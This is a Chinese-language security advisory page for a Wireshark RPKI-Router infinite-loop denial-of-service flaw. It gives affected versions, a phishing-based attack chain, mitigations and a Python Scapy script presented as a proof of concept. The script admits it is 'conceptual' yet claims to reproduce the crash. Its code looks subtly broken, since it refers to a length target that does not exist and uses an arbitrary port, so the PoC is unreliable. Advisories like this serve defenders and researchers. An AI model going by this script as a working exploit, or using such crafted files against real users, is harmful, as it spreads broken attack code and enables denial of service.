CVE-2026-6522 CVSS 5.5 中危

CVE-2026-6522 Wireshark RPKI-Router协议无限循环漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6522

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Wireshark

漏洞概述

Wireshark是一款流行的网络协议分析工具。CVE-2026-6522漏洞存在于其RPKI-Router协议解析器中。由于解析逻辑存在缺陷，处理特定数据包时会触发无限循环。攻击者可诱导用户打开恶意构造的抓包文件，导致Wireshark停止响应，造成拒绝服务。该漏洞影响4.6.0至4.6.4及4.4.0至4.4.14版本，CVSS评分为5.5（中危）。

技术细节

该漏洞的根源在于Wireshark对RPKI-Router协议数据包的解析代码中缺少有效的循环终止条件或边界检查。当解析器遍历特定的数据包结构时，如果遇到攻击者精心构造的畸形字段，程序逻辑将无法跳出循环，从而导致死循环状态。根据CVSS向量（AV:L/AC:L/PR:N/UI:R），攻击需要本地访问权限和用户交互，通常通过社会工程学诱导管理员打开包含恶意数据流的pcap文件来实施。虽然攻击无法直接远程执行代码或窃取数据，但无限循环会持续大量占用CPU资源，导致Wireshark应用程序无响应甚至崩溃（A:H），严重影响分析工作的可用性。此漏洞不涉及机密性或完整性影响，仅限于拒绝服务。

攻击链分析

STEP 1

步骤1

攻击者分析Wireshark RPKI-Router协议解析代码，发现触发无限循环的畸形数据包结构。

STEP 2

步骤2

攻击者利用脚本（如Scapy）构造包含恶意字段的pcap网络抓包文件。

STEP 3

步骤3

攻击者通过钓鱼邮件或文件共享渠道，诱导目标用户（网络管理员）下载该pcap文件。

STEP 4

步骤4

用户在受影响的Wireshark版本中打开该文件进行流量分析。

STEP 5

步骤5

Wireshark解析器处理畸形数据包时陷入无限循环，CPU占用率飙升，程序停止响应。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
PoC Generator for CVE-2026-6522 (Wireshark RPKI-Router Infinite Loop)
Description: This script generates a malformed pcap file designed to trigger
the infinite loop in the RPKI-Router dissector.
Usage: python3 generate_poc.py
"""

from scapy.all import *
import sys

# Constructing a malformed RPKI-Router packet (Conceptual)
# The specific bytes required to trigger the loop depend on the dissector's logic.
# Here we simulate a packet with a length field that causes the parser to loop.

class Malformed_RPKI(Packet):
    name = "Malformed RPKI"
    fields_desc = [
        ByteField("Version", 0),
        ByteField("PDUType", 0),
        # A malicious length field that might cause an off-by-one or endless loop
        FieldLenField("Length", None, length_of="Data", fmt="!I")
    ]

# Create the packet structure
# Note: Actual trigger bytes would require reverse engineering the specific vulnerability fix.
pkt = IP(dst="127.0.0.1")/TCP(dport=7000)/Malformed_RPKI(Length=0xFFFFFFFF)

# Save to pcap file
filename = "cve_2026_6522_poc.pcap"
wrpcap(filename, pkt)

print(f"[+] PoC file generated: {filename}")
print(f"[+] Open this file in Wireshark 4.6.0 - 4.6.4 to reproduce the DoS.")

影响范围

Wireshark 4.6.0 至 4.6.4

Wireshark 4.4.0 至 4.4.14

防御指南

临时缓解措施

在无法立即升级的情况下，用户应严格限制打开外部来源的pcap文件。对于必须分析的流量，建议使用受信任的文本编辑器（如Hex Editor）先进行初步检查，或在虚拟机中运行Wireshark以防止主机资源耗尽。此外，可在Wireshark中暂时禁用RPKI-Router协议解析器（Edit -> Preferences -> Protocols -> RPKI-Router）作为临时规避措施。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表